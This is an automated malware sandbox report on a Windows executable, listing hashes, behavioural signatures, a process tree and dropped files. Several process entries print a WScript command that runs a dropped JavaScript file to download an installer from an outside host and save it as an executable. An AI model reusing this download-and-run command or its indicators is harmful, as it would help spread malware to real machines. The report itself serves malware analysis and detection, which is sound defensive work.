Analysis

  • max time kernel
    151s
  • max time network
    170s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    04-12-2022 13:41

General

  • Target

    af1483017e1e861b0bda028e3a1fb171a27b0aa5006141988719957b924b59d5.exe

  • Size

    184KB

  • MD5

    3255ea55f4b159c1eac1dce60912bbb2

  • SHA1

    a7a7b53e259bb93e9d3a05f8a8a0bb323f6e2deb

  • SHA256

    af1483017e1e861b0bda028e3a1fb171a27b0aa5006141988719957b924b59d5

  • SHA512

    cd886f772c8aac0daf055a29bdab743b355c80d27c4a8de3522fab1428df0d77a4d569362d1389599f8aacd6525b0c0545bde351f6213109ef85a03d988320e7

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3w:/7BSH8zUB+nGESaaRvoB7FJNndn1

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af1483017e1e861b0bda028e3a1fb171a27b0aa5006141988719957b924b59d5.exe
    "C:\Users\Admin\AppData\Local\Temp\af1483017e1e861b0bda028e3a1fb171a27b0aa5006141988719957b924b59d5.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf652A.js" http://www.djapp.info/?domain=aUuDilBFAO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf652A.exe
      2⤵
      • Blocklisted process makes network request
      PID:1000
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf652A.js" http://www.djapp.info/?domain=aUuDilBFAO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf652A.exe
      2⤵
      • Blocklisted process makes network request
      PID:1672
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf652A.js" http://www.djapp.info/?domain=aUuDilBFAO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf652A.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:1796
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf652A.js" http://www.djapp.info/?domain=aUuDilBFAO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf652A.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:1632
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf652A.js" http://www.djapp.info/?domain=aUuDilBFAO.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf652A.exe
      2⤵
      • Blocklisted process makes network request
      PID:1784

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

    Filesize

    1KB

    MD5

    a4feaf11ab2269212883b999a17c7231

    SHA1

    73c157251f256fb9764366c49afd47fb55f466e1

    SHA256

    70740b40b5705b771ceb8a6229e49882aad320363388a0a44f38bacf502cdc81

    SHA512

    93a285cfadf4ea47a83f6130d72f4c3ab9da56911774601469211d403e5239c498d6855bc4362534289ae895ebf095bdfe4c24d1d327d0acfb01009756a21f47

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    61KB

    MD5

    fc4666cbca561e864e7fdf883a9e6661

    SHA1

    2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

    SHA256

    10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

    SHA512

    c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

    Filesize

    280B

    MD5

    986eda6a044d40b54bc41dfac0bfed2b

    SHA1

    d7928d9714ff509a0ba1f101be7307b01b785867

    SHA256

    ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

    SHA512

    b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

    Filesize

    438B

    MD5

    6f433eebc0b37bab24eee1455fe0dc31

    SHA1

    abc908c21cc0e180583697292703965002ef9d67

    SHA256

    6c4cc739681b61af78dcbf20185148435b560037d0b8098620441aa942da836d

    SHA512

    8e2de193582133388ff5ac61d9ca498bdb16b982db1b0a6e8e120f0ed42c70341919bdea23834498c7fc666662c14e5ead40c33af759671e5c90625e0a5af9a5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d2064a28877f508d60995fee085a4a15

    SHA1

    a05a1abf65e7cf304c44622899a99178b90b9f23

    SHA256

    33928d45a232409b313403c2e7bb7dc885978b5a3d76567c9c42e6718244addf

    SHA512

    1e1c781b9cc38c1587b557833d82ddb8264432c9fc10f06c9b7ea92d907db5eef6cb345881deb6c1fa4cfd8d765c672dad2a5de8056cf52041c1766431bb8d56

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

    Filesize

    426B

    MD5

    9e693000dd211dbea85da3397c868089

    SHA1

    17ec0c92014a26429e6f82ad001a65700af317a4

    SHA256

    58b1713dc44c1abcad20aadbfef0aff627d074267e2e8fc7a5923ffba7cadfd9

    SHA512

    350ef2a449e9c6feb900d64d87be78711d063abd8a69e1ca2bb5673bf53055a4fff023be50aff70e0f47e58865ab87f325423cc2b1c7c8055e00fde67e51fdf7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PULJ7CSW\domain_profile[1].htm

    Filesize

    7KB

    MD5

    0409cfea5c7dbdd3d872c071139ee8f6

    SHA1

    59241d4b6ff3e2922ecdf12152a8200050ac97f7

    SHA256

    ce0bae0402e37789f272341295b10bc51e529529a545895f72e4a513017b965c

    SHA512

    2d569963a2882b60eb5bc456014992786c3b3ef1d535a534f0ffce0b34ba51a9c671191c962a00c26514871f05ec1ca1fc7d09d443fc5e33a5c68fcde2d4b81c

  • C:\Users\Admin\AppData\Local\Temp\fuf652A.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\N9ZLN5V9.txt

    Filesize

    175B

    MD5

    7daed3d7b03e98b86eec4a1d249d594b

    SHA1

    0f5977335f5b47d35403653725ac787250249622

    SHA256

    8c0c6671925a2899cb5eacde44c0e84fc28769582b03e9e06d7579b648f4a5ea

    SHA512

    b06c22583ebfaa67ea12e4670924a2af2904384f5151afe6a078bc2055fa29ec1d2a2d9e2dc35028af6cecee82c4985ba3e6f3b342c1ba846b3d050f212b2e75

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\QWR56QAI.txt

    Filesize

    100B

    MD5

    2e3a7cbe0fc44feba0a16d56157fcdb2

    SHA1

    86791892ebbd935deef1b0f86eaeedb1dff71443

    SHA256

    c663ff95658a344794635cba1302f31b5ea71bfbeb9be4210bbf67e8c9c855e8

    SHA512

    7662338773e61ad4115f9c028b7e0ccc5c5e9e11942592ed829de09b903361d5690dd0476c60f478f88641cc6e2305e1a139b7a414f88ff91915cbcc45eebc98

  • memory/1000-55-0x0000000000000000-mapping.dmp

  • memory/1328-54-0x0000000075F01000-0x0000000075F03000-memory.dmp

    Filesize

    8KB

  • memory/1632-63-0x0000000000000000-mapping.dmp

  • memory/1672-58-0x0000000000000000-mapping.dmp

  • memory/1784-71-0x0000000000000000-mapping.dmp

  • memory/1796-61-0x0000000000000000-mapping.dmp